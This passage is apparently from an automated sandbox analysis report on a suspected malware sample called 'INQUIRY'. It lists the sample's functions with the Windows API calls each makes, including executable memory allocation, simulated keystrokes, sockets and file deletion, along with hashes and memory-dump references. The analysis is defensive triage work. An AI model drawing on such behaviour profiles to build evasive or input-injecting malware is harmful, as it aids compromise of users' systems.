                                                                                              • API String ID: 2574300362-199464113
                                                                                              • Opcode ID: 9e4f28b3ed34c4867080dc72f3a9cf7b15f54295beb6f7b0d40981f833cb5151
                                                                                              • Instruction ID: 2a6fcea3cd1d275333fba510a3ac687c4fd619e4ae84f885f6f06da3a13ac267
                                                                                              • Opcode Fuzzy Hash: 9e4f28b3ed34c4867080dc72f3a9cf7b15f54295beb6f7b0d40981f833cb5151
                                                                                              • Instruction Fuzzy Hash: 52D0E234A54723DFDB20AF71D85C61676E4AF05351B268D3E9586D65A0EB74C880CB90
                                                                                              Function 00A51714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime__swprintf
                                                                                              • String ID: %.3d$WIN_XPe
                                                                                              • API String ID: 2070861257-2409531811
                                                                                              • Opcode ID: aeee8f401265a5da22d0c50ab869ea42f7332272b4998594017b7b915392180d
                                                                                              • Instruction ID: c23b03f099948b0e4463b490f9b6fa9f11c61c19c1db80cae82400ceed50a4cf
                                                                                              • Opcode Fuzzy Hash: aeee8f401265a5da22d0c50ab869ea42f7332272b4998594017b7b915392180d
                                                                                              • Instruction Fuzzy Hash: 22D01772948108FBCB009B949889EFA77BCBB0C312F142562B806E2040E2358B98EE21
                                                                                              Function 00A6717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c327298f4cb78a992bb90579d0e72fc6c243ff239b6ef22dedeef37e8f159af
                                                                                              • Instruction ID: b31099e1469ff61fa69a33ff66a5760004d4dccccb3e2225bed38a1ed526b6aa
                                                                                              • Opcode Fuzzy Hash: 2c327298f4cb78a992bb90579d0e72fc6c243ff239b6ef22dedeef37e8f159af
                                                                                              • Instruction Fuzzy Hash: FDC16174A14216EFCB14CFA8C888EAEBBB5FF48718B158599E805DB351DB30DD81DB90
                                                                                              Function 00A8E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A8E0BE
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A8E101
                                                                                                • Part of subcall function 00A8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A8E301
                                                                                              • _memmove.LIBCMT ref: 00A8E314
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3659485706-0
                                                                                              • Opcode ID: a9b75d05c7630b5605b294f139bd7fdb0ce37fd4ccd83dcdab4fb4e2d87b05e3
                                                                                              • Instruction ID: b9085f7c99f87aeedeef30206b0cd91abcb07374164b6a5240352a6f543bb616
                                                                                              • Opcode Fuzzy Hash: a9b75d05c7630b5605b294f139bd7fdb0ce37fd4ccd83dcdab4fb4e2d87b05e3
                                                                                              • Instruction Fuzzy Hash: 06C13771A08301DFC714EF28C490A6ABBE4FF89754F14896EF8999B351D731E946CB82
                                                                                              Function 00A88093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A880C3
                                                                                              • CoUninitialize.OLE32 ref: 00A880CE
                                                                                                • Part of subcall function 00A6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6D5D4
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A880D9
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A883AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 780911581-0
                                                                                              • Opcode ID: aad5d20fa271896b2e062665092ebbdd47a07a28f95f3524d39d5ce93f76de9a
                                                                                              • Instruction ID: 9eddb48ad714382652077d74783b686592c00ecbf22f745542ce3115fc3810e2
                                                                                              • Opcode Fuzzy Hash: aad5d20fa271896b2e062665092ebbdd47a07a28f95f3524d39d5ce93f76de9a
                                                                                              • Instruction Fuzzy Hash: BAA164356047019FCB00EF64C991A6AB7E4FF89364F448418F99A9B3A2CF34ED41CB86
                                                                                              Function 00A67530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A676EA
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A67702
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00A9FB80,000000FF,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A67727
                                                                                              • _memcmp.LIBCMT ref: 00A67748
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: 892edf5fe5f3bb1c0769bb77a73e9752b332db2567eeb4c78a644b487607d3bd
                                                                                              • Instruction ID: dd266626d4de026c205444bec36b7c2a24de2b77de315b7084fe5017d228dccf
                                                                                              • Opcode Fuzzy Hash: 892edf5fe5f3bb1c0769bb77a73e9752b332db2567eeb4c78a644b487607d3bd
                                                                                              • Instruction Fuzzy Hash: E7810D75A10109EFCB04DFE8C984EEEB7B9FF89315F204558E506AB250DB71AE46CB60
                                                                                              Function 00A6687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                              • String ID:
                                                                                              • API String ID: 2808897238-0
                                                                                              • Opcode ID: d8d5ec13ba737465fb457f6232f80110fbfe333e6054197f0a614a6d123c505a
                                                                                              • Instruction ID: e45568a94d54c42323031b3ce3ce244aea2a3cfb235dc2a17551905fa980e13f
                                                                                              • Opcode Fuzzy Hash: d8d5ec13ba737465fb457f6232f80110fbfe333e6054197f0a614a6d123c505a
                                                                                              • Instruction Fuzzy Hash: 9551A0757043029EDB24EFA5D8A1A6AB3F9EF55350F20D81FE596EB291DA70E880C701
                                                                                              Function 00A997F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(010ED930,?), ref: 00A99863
                                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00A99896
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A99903
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 081a18aff9e11a964f1a4053a9ebd14142c6f1ad92091eea7d0a23087c5fbd90
                                                                                              • Instruction ID: 8157c543867d6f6c65fc0946c556a214e40d07a954b36006c0dad804293936c6
                                                                                              • Opcode Fuzzy Hash: 081a18aff9e11a964f1a4053a9ebd14142c6f1ad92091eea7d0a23087c5fbd90
                                                                                              • Instruction Fuzzy Hash: 03513C34A00209AFDF10CF68C984AAE7BF5FF55360F14816DF9659B2A0D730AD81DB90
                                                                                              Function 00A69A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A69AD2
                                                                                              • __itow.LIBCMT ref: 00A69B03
                                                                                                • Part of subcall function 00A69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A69DBE
                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A69B6C
                                                                                              • __itow.LIBCMT ref: 00A69BC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow
                                                                                              • String ID:
                                                                                              • API String ID: 3379773720-0
                                                                                              • Opcode ID: 0965d1c60f36c61e1b52bb36d93ba259a4fef4bcf9dda4d795b719b1633eb471
                                                                                              • Instruction ID: e25606f29507d888ee2fad25f872364522d9d9c9959306cc06d461bd77a6ee61
                                                                                              • Opcode Fuzzy Hash: 0965d1c60f36c61e1b52bb36d93ba259a4fef4bcf9dda4d795b719b1633eb471
                                                                                              • Instruction Fuzzy Hash: E1416D74A04208ABDF21EF54D946BFE7BBDEF48750F040069F905A7291DB709E84CBA1
                                                                                              Function 00A869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00A869D1
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A869E1
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A86A45
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A86A51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                                              • String ID:
                                                                                              • API String ID: 2214342067-0
                                                                                              • Opcode ID: ebb217153fa82e3bd69ddd246076ba3e53af945e8a1f12bc5eb1188ec58e40af
                                                                                              • Instruction ID: 4ed367b6b94985fd5af9067dfb586258dcac3ab68042b2b3815f7c87896a0851
                                                                                              • Opcode Fuzzy Hash: ebb217153fa82e3bd69ddd246076ba3e53af945e8a1f12bc5eb1188ec58e40af
                                                                                              • Instruction Fuzzy Hash: E441AE75740200AFEB60BF64DD96FBA77A89F04B54F048018FA59AB2C2DA749D41CB91
                                                                                              Function 00A8641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A9F910), ref: 00A864A7
                                                                                              • _strlen.LIBCMT ref: 00A864D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID:
                                                                                              • API String ID: 4218353326-0
                                                                                              • Opcode ID: 226e8c7629f01057f93341f6da06f63e8d1c24bbca9f463a330017d9558cb914
                                                                                              • Instruction ID: fb8fc33f1da7068efb954bb54014ea723e609175ffee60de209e25097f264e8c
                                                                                              • Opcode Fuzzy Hash: 226e8c7629f01057f93341f6da06f63e8d1c24bbca9f463a330017d9558cb914
                                                                                              • Instruction Fuzzy Hash: 1B419331A04104AFDB14FBA8DD96FEEB7B9AF44310F148155F81A9B292DB30EE45CB50
                                                                                              Function 00A7B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A7B89E
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00A7B8C4
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A7B8E9
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A7B915
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: c818d33d1a3045abca38aa70cc30eac2459e7d88cc44fa1ad98d31339277fa00
                                                                                              • Instruction ID: 6867bb92bc40712b4cb33f1e429f38e7d89849cb379ecb1b75121c9d65d91811
                                                                                              • Opcode Fuzzy Hash: c818d33d1a3045abca38aa70cc30eac2459e7d88cc44fa1ad98d31339277fa00
                                                                                              • Instruction Fuzzy Hash: 1E412839600610DFCB10EF15C594A9ABBE5EF4A310F19C099ED4AAB362CB30FD42CB95
                                                                                              Function 00A98851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A988DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 66153bdff29da4f2babc288a0524fab3a616d7b65f83a922bf3909c3cfe4c2c4
                                                                                              • Instruction ID: 6ce4026e9f738fda52865cef8b21c6dd07cf0f512b7173c308d64b6289840bc2
                                                                                              • Opcode Fuzzy Hash: 66153bdff29da4f2babc288a0524fab3a616d7b65f83a922bf3909c3cfe4c2c4
                                                                                              • Instruction Fuzzy Hash: 6D319034701108AEEF209FA8CC45FB877F5EB07350F644116FA15EB2A1CE78D9409752
                                                                                              Function 00A9AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9AB60
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A9ABD6
                                                                                              • PtInRect.USER32(?,?,00A9C014), ref: 00A9ABE6
                                                                                              • MessageBeep.USER32(00000000), ref: 00A9AC57
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: e07cf67c531c889347d8a5e35242691f06d9df447ee4b2d2451e1fb3c487d3fe
                                                                                              • Instruction ID: e15b5831d34e6ed7e1f9af4c4a14a4b1b11315238680ea63bca39f3d176580a7
                                                                                              • Opcode Fuzzy Hash: e07cf67c531c889347d8a5e35242691f06d9df447ee4b2d2451e1fb3c487d3fe
                                                                                              • Instruction Fuzzy Hash: 5F415B30B006199FCF11DF98D884A697BF5FB69310F1880AAE816DF264D730E842DBD2
                                                                                              Function 00A70AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A70B27
                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00A70B43
                                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A70BA9
                                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A70BFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 5fa4234be4b23b7e7cfc97fa8460b42a1ef608694260cae879b975fae6d6de14
                                                                                              • Instruction ID: 91971eb16b28959aa0037a8466ceddd10c10cadc3cb915e2622343b51e32063d
                                                                                              • Opcode Fuzzy Hash: 5fa4234be4b23b7e7cfc97fa8460b42a1ef608694260cae879b975fae6d6de14
                                                                                              • Instruction Fuzzy Hash: 9A314870A40218EEFF30CB65CC05FFABBB6ABC5319F04C25AE488921D1C3748A419751
                                                                                              Function 00A70C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00A70C66
                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A70C82
                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A70CE1
                                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00A70D33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 409536e39c828d8833c3bb0ab8ecbb0ab0a2519e2097359c008b32bf357dd5b2
                                                                                              • Instruction ID: 7703ce927f65a3134c4f871b2765b10af14a011ffae34a064f41aaa2bc649d8b
                                                                                              • Opcode Fuzzy Hash: 409536e39c828d8833c3bb0ab8ecbb0ab0a2519e2097359c008b32bf357dd5b2
                                                                                              • Instruction Fuzzy Hash: 9E31E530A40318EEFF35CB698C05FFEBBBAAB45310F14C35AE489921D1C37599559791
                                                                                              Function 00A461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A461FB
                                                                                              • __isleadbyte_l.LIBCMT ref: 00A46229
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A46257
